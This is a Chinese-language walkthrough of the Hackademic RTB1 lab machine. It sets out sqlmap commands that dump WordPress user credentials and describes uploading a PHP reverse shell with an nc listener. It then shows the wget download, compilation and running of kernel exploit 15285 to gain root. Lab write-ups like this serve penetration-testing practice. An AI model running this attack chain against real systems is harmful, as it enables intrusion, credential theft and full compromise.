直接开干

一：扫描

敏感目录扫了，没扫出来

二：试探

先随便看看

22端口不让用，那就先看看80，先访问

有提示，带一下Please go to your target and try to get root.这一行的target

根据提示，是让我们找root目录下面的Key.txt

那些紫色的看着想超链接，点一点

点posted in Uncategorized这一行的Uncategorized，查看url，看着像sql注入

加个单引号

可以sqlmap了

三:开淦

1.看所有数据库

sqlmap -u http://192.168.121.142/Hackademic_RTB1/?cat=1 --dbs

看到wordpress了

网上搜一下他的后台地址

IP地址/Hackademic_RTB1/wp-admin/

再看sqlmap

sqlmap -u http://192.168.121.142/Hackademic_RTB1/?cat=1 -D wordpress --tablessqlmap -u http://192.168.121.142/Hackademic_RTB1/?cat=1 -D wordpress -T wp_users --columns

sqlmap -u http://192.168.121.142/Hackademic_RTB1/?cat=1 -D wordpress -T wp_users --dump  懒得选，全下吧。密码加密了的，用sqlmap可以解

知道密码了，登录。这里面有个权限最高的（怎么判断？有个user_level字段，还可以一个一个登录试，高权限的登录后界面不一样）GeorgeMiller

新建一个php文件，写个反弹shell。不会可以工具生成，hack-tools扩展（但会报毒），可以在线网站（棱角社区）

传上去后，先打开nc，监听端口，然后访问反弹shell的页面，上传地址在最开始登录后设置了的，php传不上的看也看前面设置是否允许php上传。

使用uname -a，可以看见内核版本是2.6.31

再开个窗口输入：searchsploit linux 2.6.3

一个一个试，我用的15285

下载后上传到受害机（kali用python开http），受害机用wget下载，然后增加x权限，编译，运行。

python3 -m http.server 80   （kali开http）

wget http://IP/15285.c （以下在受害机的shell执行）

chmod +x 15285.c

gcc 15285.c -o 15285

./15285

完事